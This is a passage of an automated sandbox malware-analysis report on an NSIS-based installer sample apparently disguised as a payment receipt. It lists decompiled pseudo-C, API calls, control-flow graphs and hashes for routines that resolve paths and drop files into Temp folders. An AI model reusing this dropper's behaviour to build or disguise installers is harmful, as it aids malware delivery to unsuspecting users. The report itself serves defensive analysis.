                                        					__eflags = _t76 - 0x23;
                                        					if(_t76 == 0x23) {
                                        						goto L13;
                                        					}
                                        					__eflags = _t76 - 0x2e;
                                        					if(_t76 == 0x2e) {
                                        						goto L13;
                                        					} else {
                                        						_v8 = _v8 & 0x00000000;
                                        						goto L14;
                                        					}
                                        				}
                                        				 *_t110 =  *_t110 & 0x00000000;
                                        				if(_a4 == 0) {
                                        					return _t44;
                                        				}
                                        				return E0040625F(_a4, _t44);
                                        			}































                                        0x00406281
                                        0x00406281
                                        0x00406281
                                        0x00406287
                                        0x0040628c
                                        0x0040628e
                                        0x0040629d
                                        0x0040629d
                                        0x004062a5
                                        0x004062a6
                                        0x004062a7
                                        0x004062a8
                                        0x004062ab
                                        0x004062b3
                                        0x004062b5
                                        0x004062ce
                                        0x004062d1
                                        0x004062d1
                                        0x004064cd
                                        0x004064cd
                                        0x004064d3
                                        0x00000000
                                        0x00000000
                                        0x004062e1
                                        0x004062e7
                                        0x00000000
                                        0x00000000
                                        0x004062ef
                                        0x004062f0
                                        0x004062f2
                                        0x004062f6
                                        0x004062f9
                                        0x004064ba
                                        0x004064c8
                                        0x004064cb
                                        0x004064cb
                                        0x004064bc
                                        0x004064bf
                                        0x004064c2
                                        0x004064c4
                                        0x004064c4
                                        0x00000000
                                        0x004064ba
                                        0x004062ff
                                        0x00406302
                                        0x00406311
                                        0x00406318
                                        0x00406322
                                        0x00406326
                                        0x00406329
                                        0x0040632c
                                        0x00406331
                                        0x00406336
                                        0x0040633a
                                        0x0040633d
                                        0x0040645d
                                        0x00406461
                                        0x00406494
                                        0x00406498
                                        0x0040649d
                                        0x004064a2
                                        0x004064a2
                                        0x004064a7
                                        0x004064a8
                                        0x004064ad
                                        0x004064b0
                                        0x004064b3
                                        0x00000000
                                        0x004064b3
                                        0x00406463
                                        0x00406466
                                        0x00406469
                                        0x0040647e
                                        0x00406485
                                        0x0040646b
                                        0x00406472
                                        0x00406472
                                        0x0040648d
                                        0x00406490
                                        0x00406455
                                        0x00406456
                                        0x00406456
                                        0x00000000
                                        0x00406490
                                        0x00406343
                                        0x0040634b
                                        0x0040634d
                                        0x0040634e
                                        0x00406367
                                        0x00406367
                                        0x0040636e
                                        0x0040636e
                                        0x00406375
                                        0x00406379
                                        0x00406379
                                        0x0040637a
                                        0x0040637c
                                        0x004063b7
                                        0x004063ba
                                        0x004063ca
                                        0x004063cd
                                        0x004063d5
                                        0x004063db
                                        0x004063db
                                        0x00406438
                                        0x00406438
                                        0x0040643a
                                        0x00000000
                                        0x00000000
                                        0x004063df
                                        0x004063e6
                                        0x004063e7
                                        0x004063e9
                                        0x00406403
                                        0x00406411
                                        0x00406417
                                        0x00406419
                                        0x00406434
                                        0x00406434
                                        0x00406434
                                        0x00000000
                                        0x00406434
                                        0x0040641f
                                        0x0040642a
                                        0x00406430
                                        0x00406432
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406432
                                        0x004063eb
                                        0x004063ee
                                        0x00000000
                                        0x00000000
                                        0x004063fd
                                        0x004063ff
                                        0x00406401
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406401
                                        0x00000000
                                        0x00406438
                                        0x004063c2
                                        0x00000000
                                        0x0040637e
                                        0x0040639c
                                        0x004063a1
                                        0x004063a5
                                        0x00406445
                                        0x00406445
                                        0x00406448
                                        0x00406450
                                        0x00406450
                                        0x00000000
                                        0x00406448
                                        0x004063ad
                                        0x0040643c
                                        0x0040643c
                                        0x00406440
                                        0x00000000
                                        0x00000000
                                        0x00406442
                                        0x00000000
                                        0x00406442
                                        0x0040637c
                                        0x00406350
                                        0x00406355
                                        0x00000000
                                        0x00000000
                                        0x00406357
                                        0x0040635a
                                        0x00000000
                                        0x00000000
                                        0x0040635c
                                        0x0040635f
                                        0x00000000
                                        0x00406361
                                        0x00406361
                                        0x00000000
                                        0x00406361
                                        0x0040635f
                                        0x004064d9
                                        0x004064e4
                                        0x004064f0
                                        0x004064f0
                                        0x00000000

                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
                                        • SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
                                        • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
                                        • CoTaskMemFree.OLE32(007924D8), ref: 0040642A
                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
                                        • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 717251189-1230650788
                                        • Opcode ID: 1ab1bfc9e483f0d7decbabd2a64a8250e199f3f83b6f9b6e16045226286d04ff
                                        • Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
                                        • Opcode Fuzzy Hash: 1ab1bfc9e483f0d7decbabd2a64a8250e199f3f83b6f9b6e16045226286d04ff
                                        • Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 563 40176f-401794 call 402c37 call 405ba7 568 401796-40179c call 40625f 563->568 569 40179e-4017b0 call 40625f call 405b30 lstrcatW 563->569 575 4017b5-4017b6 call 4064f3 568->575 569->575 578 4017bb-4017bf 575->578 579 4017c1-4017cb call 4065a2 578->579 580 4017f2-4017f5 578->580 588 4017dd-4017ef 579->588 589 4017cd-4017db CompareFileTime 579->589 582 4017f7-4017f8 call 405d2c 580->582 583 4017fd-401819 call 405d51 580->583 582->583 590 40181b-40181e 583->590 591 40188d-4018b6 call 4052c3 call 4030fa 583->591 588->580 589->588 592 401820-40185e call 40625f * 2 call 406281 call 40625f call 4058c1 590->592 593 40186f-401879 call 4052c3 590->593 605 4018b8-4018bc 591->605 606 4018be-4018ca SetFileTime 591->606 592->578 626 401864-401865 592->626 603 401882-401888 593->603 607 402ac8 603->607 605->606 609 4018d0-4018db CloseHandle 605->609 606->609 610 402aca-402ace 607->610 612 4018e1-4018e4 609->612 613 402abf-402ac2 609->613 615 4018e6-4018f7 call 406281 lstrcatW 612->615 616 4018f9-4018fc call 406281 612->616 613->607 621 401901-4022f6 call 4058c1 615->621 616->621 621->610 626->603 628 401867-401868 626->628 628->593
                                        C-Code - Quality: 61%
                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                                        				void* __edi;
                                        				void* _t35;
                                        				void* _t43;
                                        				void* _t45;
                                        				FILETIME* _t51;
                                        				FILETIME* _t64;
                                        				void* _t66;
                                        				signed int _t72;
                                        				FILETIME* _t73;
                                        				FILETIME* _t77;
                                        				signed int _t79;
                                        				void* _t81;
                                        				void* _t82;
                                        				WCHAR* _t84;
                                        				void* _t86;
                                        
                                        				_t77 = __ebx;
                                        				 *(_t86 - 8) = E00402C37(0x31);
                                        				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
                                        				_t35 = E00405BA7( *(_t86 - 8));
                                        				_push( *(_t86 - 8));
                                        				_t84 = L"Call";
                                        				if(_t35 == 0) {
                                        					lstrcatW(E00405B30(E0040625F(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated\\Stereoing")), ??);
                                        				} else {
                                        					E0040625F();
                                        				}
                                        				E004064F3(_t84);
                                        				while(1) {
                                        					__eflags =  *(_t86 + 8) - 3;
                                        					if( *(_t86 + 8) >= 3) {
                                        						_t66 = E004065A2(_t84);
                                        						_t79 = 0;
                                        						__eflags = _t66 - _t77;
                                        						if(_t66 != _t77) {
                                        							_t73 = _t66 + 0x14;
                                        							__eflags = _t73;
                                        							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
                                        						}
                                        						asm("sbb eax, eax");
                                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                        						__eflags = _t72;
                                        						 *(_t86 + 8) = _t72;
                                        					}
                                        					__eflags =  *(_t86 + 8) - _t77;
                                        					if( *(_t86 + 8) == _t77) {
                                        						E00405D2C(_t84);
                                        					}
                                        					__eflags =  *(_t86 + 8) - 1;
                                        					_t43 = E00405D51(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                        					__eflags = _t43 - 0xffffffff;
                                        					 *(_t86 - 0x30) = _t43;
                                        					if(_t43 != 0xffffffff) {
                                        						break;
                                        					}
                                        					__eflags =  *(_t86 + 8) - _t77;
                                        					if( *(_t86 + 8) != _t77) {
                                        						E004052C3(0xffffffe2,  *(_t86 - 8));
                                        						__eflags =  *(_t86 + 8) - 2;
                                        						if(__eflags == 0) {
                                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                                        						}
                                        						L31:
                                        						 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t86 - 4));
                                        						__eflags =  *0x7a8ac8;
                                        						goto L32;
                                        					} else {
                                        						E0040625F("C:\Users\Arthur\AppData\Local\Temp\nsz62F8.tmp", _t81);
                                        						E0040625F(_t81, _t84);
                                        						E00406281(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsz62F8.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
                                        						E0040625F(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsz62F8.tmp");
                                        						_t64 = E004058C1("C:\Users\Arthur\AppData\Local\Temp\nsz62F8.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
                                        						__eflags = _t64;
                                        						if(_t64 == 0) {
                                        							continue;
                                        						} else {
                                        							__eflags = _t64 == 1;
                                        							if(_t64 == 1) {
                                        								 *0x7a8ac8 =  &( *0x7a8ac8->dwLowDateTime);
                                        								L32:
                                        								_t51 = 0;
                                        								__eflags = 0;
                                        							} else {
                                        								_push(_t84);
                                        								_push(0xfffffffa);
                                        								E004052C3();
                                        								L29:
                                        								_t51 = 0x7fffffff;
                                        							}
                                        						}
                                        					}
                                        					L33:
                                        					return _t51;
                                        				}
                                        				E004052C3(0xffffffea,  *(_t86 - 8)); // executed
                                        				 *0x7a8af4 =  *0x7a8af4 + 1;
                                        				_push(_t77);
                                        				_push(_t77);
                                        				_push( *(_t86 - 0x30));
                                        				_push( *((intOrPtr*)(_t86 - 0x20)));
                                        				_t45 = E004030FA(); // executed
                                        				 *0x7a8af4 =  *0x7a8af4 - 1;
                                        				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
                                        				_t82 = _t45;
                                        				if( *(_t86 - 0x1c) != 0xffffffff) {
                                        					L22:
                                        					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
                                        				} else {
                                        					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
                                        					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
                                        						goto L22;
                                        					}
                                        				}
                                        				CloseHandle( *(_t86 - 0x30)); // executed
                                        				__eflags = _t82 - _t77;
                                        				if(_t82 >= _t77) {
                                        					goto L31;
                                        				} else {
                                        					__eflags = _t82 - 0xfffffffe;
                                        					if(_t82 != 0xfffffffe) {
                                        						E00406281(_t77, _t82, _t84, _t84, 0xffffffee);
                                        					} else {
                                        						E00406281(_t77, _t82, _t84, _t84, 0xffffffe9);
                                        						lstrcatW(_t84,  *(_t86 - 8));
                                        					}
                                        					_push(0x200010);
                                        					_push(_t84);
                                        					E004058C1();
                                        					goto L29;
                                        				}
                                        				goto L33;
                                        			}


















                                        0x0040176f
                                        0x00401776
                                        0x00401782
                                        0x00401785
                                        0x0040178a
                                        0x0040178d
                                        0x00401794
                                        0x004017b0
                                        0x00401796
                                        0x00401797
                                        0x00401797
                                        0x004017b6
                                        0x004017bb
                                        0x004017bb
                                        0x004017bf
                                        0x004017c2
                                        0x004017c7
                                        0x004017c9
                                        0x004017cb
                                        0x004017d0
                                        0x004017d0
                                        0x004017db
                                        0x004017db
                                        0x004017ec
                                        0x004017ee
                                        0x004017ee
                                        0x004017ef
                                        0x004017ef
                                        0x004017f2
                                        0x004017f5
                                        0x004017f8
                                        0x004017f8
                                        0x004017ff
                                        0x0040180e
                                        0x00401813
                                        0x00401816
                                        0x00401819
                                        0x00000000
                                        0x00000000
                                        0x0040181b
                                        0x0040181e
                                        0x00401874
                                        0x00401879
                                        0x004015b6
                                        0x00402885
                                        0x00402885
                                        0x00402abf
                                        0x00402ac2
                                        0x00402ac2
                                        0x00000000
                                        0x00401820
                                        0x00401826
                                        0x0040182d
                                        0x0040183a
                                        0x00401845
                                        0x0040185b
                                        0x0040185b
                                        0x0040185e
                                        0x00000000
                                        0x00401864
                                        0x00401864
                                        0x00401865
                                        0x00401882
                                        0x00402ac8
                                        0x00402ac8
                                        0x00402ac8
                                        0x00401867
                                        0x00401867
                                        0x00401868
                                        0x00401493
                                        0x004022f1
                                        0x004022f1
                                        0x004022f1
                                        0x00401865
                                        0x0040185e
                                        0x00402aca
                                        0x00402ace
                                        0x00402ace
                                        0x00401892
                                        0x00401897
                                        0x0040189d
                                        0x0040189e
                                        0x0040189f
                                        0x004018a2
                                        0x004018a5
                                        0x004018aa
                                        0x004018b0
                                        0x004018b4
                                        0x004018b6
                                        0x004018be
                                        0x004018ca
                                        0x004018b8
                                        0x004018b8
                                        0x004018bc
                                        0x00000000
                                        0x00000000
                                        0x004018bc
                                        0x004018d3
                                        0x004018d9
                                        0x004018db
                                        0x00000000
                                        0x004018e1
                                        0x004018e1
                                        0x004018e4
                                        0x004018fc
                                        0x004018e6
                                        0x004018e9
                                        0x004018f2
                                        0x004018f2
                                        0x00401901
                                        0x00401906
                                        0x004022ec
                                        0x00000000
                                        0x004022ec
                                        0x00000000

                                        APIs
                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Stereoing,?,?,00000031), ref: 004017D5
                                          • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Blass Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                          • Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,765823A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                          • Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,765823A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                          • Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
                                          • Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Stereoing$C:\Users\user\AppData\Local\Temp\nsz62F8.tmp$C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\System.dll$Call
                                        • API String ID: 1941528284-1618965111
                                        • Opcode ID: 3036717f3dd684cf2377e65c949b0f8917e20074c55b6eb4d43db9bd976140e3
                                        • Instruction ID: f7ad0716a47908c9ff001062aeffa45098cd3b08a1486a00dbbe40ca2a302bdd
                                        • Opcode Fuzzy Hash: 3036717f3dd684cf2377e65c949b0f8917e20074c55b6eb4d43db9bd976140e3
                                        • Instruction Fuzzy Hash: 56419671910515BECF117BA5CD85DAF3A75EF41329B20823FF412B11E2CA3C8A529A6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 629 402644-40265d call 402c15 632 402663-40266a 629->632 633 402abf-402ac2 629->633 635 40266c 632->635 636 40266f-402672 632->636 634 402ac8-402ace 633->634 635->636 638 4027d6-4027de 636->638 639 402678-402687 call 4061bf 636->639 638->633 639->638 642 40268d 639->642 643 402693-402697 642->643 644 40272c-40272f 643->644 645 40269d-4026b8 ReadFile 643->645 647 402731-402734 644->647 648 402747-402757 call 405dd4 644->648 645->638 646 4026be-4026c3 645->646 646->638 651 4026c9-4026d7 646->651 647->648 649 402736-402741 call 405e32 647->649 648->638 657 402759 648->657 649->638 649->648 654 402792-40279e call 4061a6 651->654 655 4026dd-4026ef MultiByteToWideChar 651->655 654->634 655->657 658 4026f1-4026f4 655->658 660 40275c-40275f 657->660 661 4026f6-402701 658->661 660->654 663 402761-402766 660->663 661->660 664 402703-402728 SetFilePointer MultiByteToWideChar 661->664 665 4027a3-4027a7 663->665 666 402768-40276d 663->666 664->661 667 40272a 664->667 668 4027c4-4027d0 SetFilePointer 665->668 669 4027a9-4027ad 665->669 666->665 670 40276f-402782 666->670 667->657 668->638 671 4027b5-4027c2 669->671 672 4027af-4027b3 669->672 670->638 673 402784-40278a 670->673 671->638 672->668 672->671 673->643 674 402790 673->674 674->638
                                        C-Code - Quality: 83%
                                        			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
                                        				intOrPtr _t65;
                                        				intOrPtr _t66;
                                        				intOrPtr _t72;
                                        				void* _t76;
                                        				void* _t79;
                                        
                                        				_t72 = __edx;
                                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                        				_t65 = 2;
                                        				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
                                        				_t66 = E00402C15(_t65);
                                        				_t79 = _t66 - 1;
                                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
                                        				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
                                        				if(_t79 < 0) {
                                        					L36:
                                        					 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t76 - 4));
                                        				} else {
                                        					__ecx = 0x3ff;
                                        					if(__eax > 0x3ff) {
                                        						 *(__ebp - 0x3c) = 0x3ff;
                                        					}
                                        					if( *__esi == __bx) {
                                        						L34:
                                        						__ecx =  *(__ebp - 0xc);
                                        						__eax =  *(__ebp - 8);
                                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                        						if(_t79 == 0) {
                                        							 *((intOrPtr*)(_t76 - 4)) = 1;
                                        						}
                                        						goto L36;
                                        					} else {
                                        						 *(__ebp - 0x30) = __ebx;
                                        						 *(__ebp - 0x10) = E004061BF(__ecx, __esi);
                                        						if( *(__ebp - 0x3c) > __ebx) {
                                        							do {
                                        								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
                                        									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E32( *(__ebp - 0x10), __ebx) >= 0) {
                                        										__eax = __ebp - 0x44;
                                        										if(E00405DD4( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
                                        											goto L34;
                                        										} else {
                                        											goto L21;
                                        										}
                                        									} else {
                                        										goto L34;
                                        									}
                                        								} else {
                                        									__eax = __ebp - 0x38;
                                        									_push(__ebx);
                                        									_push(__ebp - 0x38);
                                        									__eax = 2;
                                        									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
                                        									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
                                        									if(__eax == 0) {
                                        										goto L34;
                                        									} else {
                                        										__ecx =  *(__ebp - 0x38);
                                        										if(__ecx == __ebx) {
                                        											goto L34;
                                        										} else {
                                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                        											 *(__ebp - 0x48) = __ecx;
                                        											 *(__ebp - 0x44) = __eax;
                                        											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                        												L28:
                                        												__ax & 0x0000ffff = E004061A6( *(__ebp - 0xc), __ax & 0x0000ffff);
                                        											} else {
                                        												__ebp - 0x44 = __ebp + 0xa;
                                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, ?str?) != 0) {
                                        													L21:
                                        													__eax =  *(__ebp - 0x44);
                                        												} else {
                                        													__esi =  *(__ebp - 0x48);
                                        													__esi =  ~( *(__ebp - 0x48));
                                        													while(1) {
                                        														_t22 = __ebp - 0x38;
                                        														 *_t22 =  *(__ebp - 0x38) - 1;
                                        														__eax = 0xfffd;
                                        														 *(__ebp - 0x44) = 0xfffd;
                                        														if( *_t22 == 0) {
                                        															goto L22;
                                        														}
                                        														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
                                        														__esi = __esi + 1;
                                        														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, "true"); // executed
                                        														__ebp - 0x44 = __ebp + 0xa;
                                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, ?str?) == 0) {
                                        															continue;
                                        														} else {
                                        															goto L21;
                                        														}
                                        														goto L22;
                                        													}
                                        												}
                                        												L22:
                                        												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                        													goto L28;
                                        												} else {
                                        													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
                                        														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
                                        															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
                                        															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, "true");
                                        														} else {
                                        															__ecx =  *(__ebp - 0xc);
                                        															__edx =  *(__ebp - 8);
                                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                        														}
                                        														goto L34;
                                        													} else {
                                        														__ecx =  *(__ebp - 0xc);
                                        														__edx =  *(__ebp - 8);
                                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                        														 *(__ebp - 0x30) = __eax;
                                        														if(__ax == __bx) {
                                        															goto L34;
                                        														} else {
                                        															goto L26;
                                        														}
                                        													}
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        								goto L37;
                                        								L26:
                                        								__eax =  *(__ebp - 8);
                                        							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
                                        						}
                                        						goto L34;
                                        					}
                                        				}
                                        				L37:
                                        				return 0;
                                        			}








                                        0x00402644
                                        0x00402646
                                        0x00402649
                                        0x0040264b
                                        0x0040264e
                                        0x00402653
                                        0x00402657
                                        0x0040265a
                                        0x0040265d
                                        0x00402abf
                                        0x00402ac2
                                        0x00402663
                                        0x00402663
                                        0x0040266a
                                        0x0040266c
                                        0x0040266c
                                        0x00402672
                                        0x004027d6
                                        0x004027d6
                                        0x004027d9
                                        0x004027de
                                        0x004015b6
                                        0x00402885
                                        0x00402885
                                        0x00000000
                                        0x00402678
                                        0x00402679
                                        0x00402684
                                        0x00402687
                                        0x00402693
                                        0x00402697
                                        0x0040272f
                                        0x00402747
                                        0x00402757
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040269d
                                        0x0040269d
                                        0x004026a0
                                        0x004026a1
                                        0x004026a4
                                        0x004026a9
                                        0x004026b0
                                        0x004026b8
                                        0x00000000
                                        0x004026be
                                        0x004026be
                                        0x004026c3
                                        0x00000000
                                        0x004026c9
                                        0x004026c9
                                        0x004026d1
                                        0x004026d4
                                        0x004026d7
                                        0x00402792
                                        0x00402799
                                        0x004026dd
                                        0x004026e3
                                        0x004026ef
                                        0x00402759
                                        0x00402759
                                        0x004026f1
                                        0x004026f1
                                        0x004026f4
                                        0x004026f6
                                        0x004026f6
                                        0x004026f6
                                        0x004026f9
                                        0x004026fe
                                        0x00402701
                                        0x00000000
                                        0x00000000
                                        0x00402703
                                        0x00402706
                                        0x0040270e
                                        0x0040271a
                                        0x00402728
                                        0x00000000
                                        0x0040272a
                                        0x00000000
                                        0x0040272a
                                        0x00000000
                                        0x00402728
                                        0x004026f6
                                        0x0040275c
                                        0x0040275f
                                        0x00000000
                                        0x00402761
                                        0x00402766
                                        0x004027a7
                                        0x004027c9
                                        0x004027d0
                                        0x004027b5
                                        0x004027b5
                                        0x004027b8
                                        0x004027bb
                                        0x004027be
                                        0x004027be
                                        0x00000000
                                        0x0040276f
                                        0x0040276f
                                        0x00402772
                                        0x00402775
                                        0x0040277b
                                        0x0040277f
                                        0x00402782
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402782
                                        0x00402766
                                        0x0040275f
                                        0x004026d7
                                        0x004026c3
                                        0x004026b8
                                        0x00000000
                                        0x00402784
                                        0x00402784
                                        0x00402787
                                        0x00402790
                                        0x00000000
                                        0x00402687
                                        0x00402672
                                        0x00402ac8
                                        0x00402ace

                                        APIs
                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
